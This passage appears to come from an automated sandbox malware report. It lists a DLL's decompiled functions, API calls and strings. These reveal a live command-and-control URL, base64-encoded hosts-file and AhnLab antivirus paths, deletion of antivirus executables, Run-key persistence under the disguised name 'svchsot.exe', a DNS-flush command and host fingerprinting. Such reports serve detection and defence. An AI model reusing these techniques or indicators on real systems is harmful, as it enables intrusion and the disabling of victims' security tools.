wsprintfA.USER32 ref: 10007863

Part of subcall function 10004940: InternetOpenA.WININET(?,?,?,?,?), ref: 10004959

Strings

http://blog.sina.com.cn/u/%s, xrefs: 10007857
title, xrefs: 10007A07, 10007A18
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0), xrefs: 10007885

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: InternetOpenwsprintf
String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)$http://blog.sina.com.cn/u/%s$title
API String ID: 4197039022-1204782975
Opcode ID: ac3329271bd9d36dabe8b2f1c970d2275d2f31060d9b6ba8ce49d74b3c14c55d
Instruction ID: 095fe5dde53d71875dce48b6fc83110d19f8d3916a50ec2a0be112dbd884ee86
Opcode Fuzzy Hash: ac3329271bd9d36dabe8b2f1c970d2275d2f31060d9b6ba8ce49d74b3c14c55d
Instruction Fuzzy Hash: 8DD16B75E041446FEB14CF68CC81BFEBBA5FB442A0F10426EF9199B281DB769E01C7A1

Function 100075F0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 168
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strstr.MSVCRT ref: 1000769B
strstr.MSVCRT ref: 100076BF
strcspn.MSVCRT ref: 100076CE
strstr.MSVCRT ref: 100076DA
strcspn.MSVCRT ref: 100076E9
strncpy.MSVCRT ref: 100076F2
strstr.MSVCRT ref: 1000772F
strcspn.MSVCRT ref: 10007742
strncpy.MSVCRT ref: 10007752
strcspn.MSVCRT ref: 10007762
atoi.MSVCRT(?), ref: 10007769
WSAStartup.WS2_32(00000202,?), ref: 10007783
htons.WS2_32(00000000), ref: 10007795
socket.WS2_32(00000002,00000001,00000000), ref: 100077BA
connect.WS2_32(00000000,?,00000010), ref: 100077CA
closesocket.WS2_32(00000000), ref: 100077D6

Strings

http://, xrefs: 10007695

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: strcspnstrstr$strncpy$Startupatoiclosesocketconnecthtonssocket
String ID: http://
API String ID: 2221484516-1121587658
Opcode ID: 5c2d05fa6207655839d0808158efd3d400898c35f4cf240536f96aa1fb864cbe
Instruction ID: c21daf10c3e951720ad3e589d1e55667024fa973de2a3a3a443ae2c0494599a8
Opcode Fuzzy Hash: 5c2d05fa6207655839d0808158efd3d400898c35f4cf240536f96aa1fb864cbe
Instruction Fuzzy Hash: 1E5104312043046BE314CB34CC44BEBB3D9FFC9350F404A2CFA5997280EB79DA1886A6

Function 10004DA0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 145
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,771B0F00,10005086,00000000,self), ref: 10004DFC
strrchr.MSVCRT ref: 10004E09
CreateFileA.KERNEL32(?,MZ@,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004E78
time.MSVCRT(00000000), ref: 10004E7F
_localtime32.MSVCRT(?), ref: 10004E8E
strftime.MSVCRT ref: 10004EA1
vsprintf.MSVCRT ref: 10004EF3
sprintf.MSVCRT ref: 10004F13
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10004F3D
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10004F44

Strings

MZ@, xrefs: 10004E5C
%s%s, xrefs: 10004F0D
log.txt, xrefs: 10004E1D

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: File$CloseCreateHandleModuleNamePointerWrite_localtime32sprintfstrftimestrrchrtimevsprintf
String ID: %s%s$MZ@$log.txt
API String ID: 2392943451-673521906
Opcode ID: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
Instruction ID: d5d278936535e4cba90bc0b152de8e4c93260a9cf759ec48f07ff2ba3d5d953d
Opcode Fuzzy Hash: d1bdc3c774a689637d6f495e9813b9ee9ac93210ea13629b8e67d8557dd03d55
Instruction Fuzzy Hash: DF41B5B1148345AFE328CB74CC899EB7BA9EBC8350F404A2DF75A872D0DFB499098651

Function 10009240 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 205
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
Part of subcall function 10001000: 6D7C2C70.MFC42(00000001,?,771B0F00), ref: 1000115C

Sleep.KERNEL32(0000EA60), ref: 10009288
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100092D3
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100092DF
Sleep.KERNEL32(000927C0), ref: 10009420
wsprintfA.USER32 ref: 10009471
Sleep.KERNEL32(000927C0), ref: 100094CB

Strings

XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100092FF
c:\1.txt, xrefs: 1000940C
QVlSVFNydi5heWU=, xrefs: 10009258
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100092E1
http://107.163.241.232:12354/show.php, xrefs: 100093C7
iOffset, xrefs: 10009407
QVNEU3ZjLmV4ZQ==, xrefs: 1000924E

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep$DirectorySystem$lstrcpywsprintf
String ID: QVNEU3ZjLmV4ZQ==$QVlSVFNydi5heWU=$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.241.232:12354/show.php$iOffset
API String ID: 2291147283-888787304
Opcode ID: 5922782ddf026c53060f0f63c1ad289b21dee719ea41d24eaeab7540742c2ec5
Instruction ID: b8854392ff10616702e47e0bcfff7711cc3888a46334cdc6d8595219f0281411
Opcode Fuzzy Hash: 5922782ddf026c53060f0f63c1ad289b21dee719ea41d24eaeab7540742c2ec5
Instruction Fuzzy Hash: B55146756046446BE365C674CC52BEB36C6EBC82D0F100A3CF64A872C6EE71EA498692

Function 1000B6A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 189
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6EA
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000B6F9

Part of subcall function 10001000: lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
Part of subcall function 10001000: 6D7C2C70.MFC42(00000001,?,771B0F00), ref: 1000115C

Sleep.KERNEL32(000927C0), ref: 1000B822
wsprintfA.USER32 ref: 1000B8A7
Sleep.KERNEL32(000927C0), ref: 1000B8D5

Strings

XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 1000B716
XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 1000B6FB
cmd.exe /c ipconfig /flushdns, xrefs: 1000B8C4
http://107.163.241.232:12354/show.php, xrefs: 1000B7DB
8.8.8.8, xrefs: 1000B8B0
127.0.0.1, xrefs: 1000B8B5

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: DirectorySleepSystem$lstrcpywsprintf
String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$cmd.exe /c ipconfig /flushdns$http://107.163.241.232:12354/show.php
API String ID: 2704893763-1395296613
Opcode ID: db2d6b3046defbdf920574d5d26133844e3622f0e207e53ae40463d585e72ec7
Instruction ID: 0c20509c5945297f8f237a4b3797596a51a84c821cbe864c7c2b37f26de8eee8
Opcode Fuzzy Hash: db2d6b3046defbdf920574d5d26133844e3622f0e207e53ae40463d585e72ec7
Instruction Fuzzy Hash: CC518D71504A486BE364CA74CC91AEB3BCAEB893D0F104A3CF7468B2D5EE71D948C391

Function 10006F20 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 151
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000002,?,00000000,000F003F,?,?,?,?), ref: 10006F4F
GlobalMemoryStatusEx.KERNEL32(?), ref: 10007009
GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?), ref: 10007062

Part of subcall function 10004C70: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,771B0F10,?,1000AAC6,?,771B0F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E

Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,771B0F00), ref: 10004C65

Strings

%u MB, xrefs: 1000702C
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10006F32
@, xrefs: 10007000
09121307, xrefs: 10007037
http://107.163.241.232:12354/show.php, xrefs: 100070E5
Find CPU Error, xrefs: 10006FC1
ProcessorNameString, xrefs: 10006F71

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseDefaultGlobalLanguageMemoryOpenQueryStatusSystemValue
String ID: %u MB$09121307$@$Find CPU Error$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$http://107.163.241.232:12354/show.php
API String ID: 2543995030-394306148
Opcode ID: 4e22ea78a27a306f584328a55715875c7210a62967ded5604e4a38dd3874c05e
Instruction ID: 3ad2bcc863b837c91c8faade8dea923d340ec5ffd05ed7ea934ab2fdf9765298
Opcode Fuzzy Hash: 4e22ea78a27a306f584328a55715875c7210a62967ded5604e4a38dd3874c05e
Instruction Fuzzy Hash: 8041F5766002045BE714CA28DC81BAB77D6FBC8350F544A2CFA59CB2C5EE78E908C796

Function 1000B8E0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 65
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 1000B95F
DeleteFileA.KERNEL32(?), ref: 1000B96F
wsprintfA.USER32 ref: 1000B990
DeleteFileA.KERNEL32(?), ref: 1000B99A
DeleteFileA.KERNEL32(C:\1.vbs), ref: 1000B9A1

Strings

U09GVFdBUkVcQWhuTGFiXFYzTGl0ZQ==, xrefs: 1000B92F
InstallPath, xrefs: 1000B92A
C:\1.vbs, xrefs: 1000B99C
%s\V3Lite.exe, xrefs: 1000B98A
%s\ASDSvc.exe, xrefs: 1000B959

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: DeleteFile$wsprintf
String ID: %s\ASDSvc.exe$%s\V3Lite.exe$C:\1.vbs$InstallPath$U09GVFdBUkVcQWhuTGFiXFYzTGl0ZQ==
API String ID: 1588361905-790033058
Opcode ID: 78508965cc5a19c928f5a57ae299255aa932a64f56e005951962bd9cc420be60
Instruction ID: 1dfada7e8b5ca1f324769cc69037653655a4e6411eba5475badaeff67279124f
Opcode Fuzzy Hash: 78508965cc5a19c928f5a57ae299255aa932a64f56e005951962bd9cc420be60
Instruction Fuzzy Hash: E2110AB65043447EE714D264DC82EEBB7A9EBC8350F00892DF74897141EAB8A54C87A3

Function 10008CF0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61
sleepsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 10008D13

Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF

GetLastError.KERNEL32 ref: 10008D2C
CloseHandle.KERNEL32(00000000), ref: 10008D9E

Part of subcall function 10007800: wsprintfA.USER32 ref: 10007863

Sleep.KERNEL32(0002BF20,00000000,00000000), ref: 10008D60
CreateThread.KERNEL32 ref: 10008D7C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008D87
CloseHandle.KERNEL32(00000000), ref: 10008D8E
Sleep.KERNEL32(0002BF20), ref: 10008D99

Strings

5655029807, xrefs: 10008D4A
0x5d65r455f, xrefs: 10008D19

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreateHandleSleep$ErrorLastMutexObjectSingleStartupThreadWaitwsprintf
String ID: 0x5d65r455f$5655029807
API String ID: 3565103679-1179119988
Opcode ID: 1a3b27e525e8e5581aee81941031d63d0a25c614fe17f581aa30fa82347c58f1
Instruction ID: 7f0c169c507e5996f06a3fa8500c359fcd6d382ddda4958c890d8906a17dfaa3
Opcode Fuzzy Hash: 1a3b27e525e8e5581aee81941031d63d0a25c614fe17f581aa30fa82347c58f1
Instruction Fuzzy Hash: 90112BB664021477F361D7609C4AFAA3748E755391F014231FB05991C6DA749514C3A7

Function 1000C3E0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Netbios.NETAPI32 ref: 1000C41F
Netbios.NETAPI32(?), ref: 1000C45B

Strings

2, xrefs: 1000C452
%02X%02X%02X%02X%02X%02X, xrefs: 1000C558
3, xrefs: 1000C4BE

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Netbios
String ID: %02X%02X%02X%02X%02X%02X$2$3
API String ID: 544444789-1505804699
Opcode ID: ed2c05e4c58613b2c26dfba51cf9c36810fcacaa73115f46d11269ef5a7d970f
Instruction ID: 728b9448df0537b33cd7c33a8ad28386f52a8ed2ab8d8cf9ed196ef958deebfa
Opcode Fuzzy Hash: ed2c05e4c58613b2c26dfba51cf9c36810fcacaa73115f46d11269ef5a7d970f
Instruction Fuzzy Hash: E141BC361187829BD724CB68C8107FBB7E5EFC4354F44483DA5D48B682DAB8A6098793

Function 1000B9B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108
registrysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,00000000), ref: 1000BA17
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000BA4D
RegCloseKey.ADVAPI32(00000000), ref: 1000BAFD
Sleep.KERNEL32(000493E0), ref: 1000BB08

Strings

svchsot.exe, xrefs: 1000BAC8
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000BA0D

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseInfoOpenQuerySleep
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$svchsot.exe
API String ID: 2225969182-2172464104
Opcode ID: 08361449016b7f44612439fb6acee60cc4640fc407a9dfebd49ab1ea5b08d991
Instruction ID: 8391b5504ccf8cab49b59508a831428093b3ef4b36d771d3e57068c3abc199ad
Opcode Fuzzy Hash: 08361449016b7f44612439fb6acee60cc4640fc407a9dfebd49ab1ea5b08d991
Instruction Fuzzy Hash: 00313D71209342AFE311CF55CC84FABB7E9FBC9B44F40492DF28596184DA74EA05CBA2

Function 10008DC0 Relevance: 10.5, APIs: 7, Instructions: 46sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 10008DD4

Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008DF5), ref: 100048EF

GetLastError.KERNEL32 ref: 10008DFA
CreateThread.KERNEL32(00000000,00000000,Function_00008A70,?,00000000,00000000), ref: 10008E20
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008E27
CloseHandle.KERNEL32(00000000), ref: 10008E2A
Sleep.KERNEL32(00002710), ref: 10008E35
CloseHandle.KERNEL32(00000000), ref: 10008E3E

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
String ID:
API String ID: 3243752880-0
Opcode ID: a33727e10fbf79d2b309350ef58ca67d960a310af08ab45507f6163eac35f4c8
Instruction ID: a359fb298355683a4573c8a866c24d0698d26be9667dacd13f7a321984fbe110
Opcode Fuzzy Hash: a33727e10fbf79d2b309350ef58ca67d960a310af08ab45507f6163eac35f4c8
Instruction Fuzzy Hash: C9012875244260BBF2219760DC4EF9E3B68FB8A7A0F114224FB18961C2C7B4691083BB

Function 100094E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 117sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000927C0), ref: 1000959A
wsprintfA.USER32 ref: 1000961F
Sleep.KERNEL32(000927C0), ref: 10009633

Strings

http://107.163.241.232:12354/show.php, xrefs: 10009553

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep$wsprintf
String ID: http://107.163.241.232:12354/show.php
API String ID: 3195947292-2344152501
Opcode ID: 8f976409f3338855f43dfdd1e78e4cb3942958b9788ba1596308c0077738c756
Instruction ID: d4c08372696571601e49f361774c7e6739f4c64afbccb80dc67fb9e03b5bb553
Opcode Fuzzy Hash: 8f976409f3338855f43dfdd1e78e4cb3942958b9788ba1596308c0077738c756
Instruction Fuzzy Hash: 26315E71504A856BF365CA34CC92ADB3BC7EB853D0F11492CF6858B189EA37D9498352

Function 10001000 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
6D7C2C70.MFC42(00000001,?,771B0F00), ref: 1000115C

Strings

VUUU, xrefs: 10001056

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: lstrcpy
String ID: VUUU
API String ID: 3722407311-2040033107
Opcode ID: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
Instruction ID: c786a2ff591aff92977bd3f5140d7e1907602f98ed4a153bb8b8b05817a39e60
Opcode Fuzzy Hash: d333b3c2b3d2ade3472a0c98afb8ba078a3a655890211f516e2ff079b765f810
Instruction Fuzzy Hash: AF416B31B0049207F32DC62C8CB227ABBD2DB922C0B54813EE6C7C7256D9A2DD66C350

Function 10011171 Relevance: 3.8, APIs: 3, Instructions: 54COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 1001119F
_initterm.MSVCRT ref: 100111CA
free.MSVCRT ref: 10011207

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: _inittermfreemalloc
String ID:
API String ID: 1678931842-0
Opcode ID: 5140d0d9db605dcb194d2652ea19dca16f20f6a940eaa12075955abeed17ba9d
Instruction ID: ad2f920e9778d69807a12391a49186a6d5e25611a08f9dc3c907af6526498538
Opcode Fuzzy Hash: 5140d0d9db605dcb194d2652ea19dca16f20f6a940eaa12075955abeed17ba9d
Instruction Fuzzy Hash: A4112E32648226ABE718CB64EDD5F8977A5FB05295F158019E901CB2A0E732E890CB95

Function 10002580 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(70440000,00000000), ref: 100025A4

Strings

TmV0TG9jYWxHcm91cEVudW0=, xrefs: 10002590

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID: TmV0TG9jYWxHcm91cEVudW0=
API String ID: 190572456-980335172
Opcode ID: ded17689c4bd67110a5be128d15644960cbee1cf4a5f393b86463d8bf9b49e85
Instruction ID: e2bb3045dcad879353c92d9ca582775d4a1260cfb397e564f33c378eb59ea92b
Opcode Fuzzy Hash: ded17689c4bd67110a5be128d15644960cbee1cf4a5f393b86463d8bf9b49e85
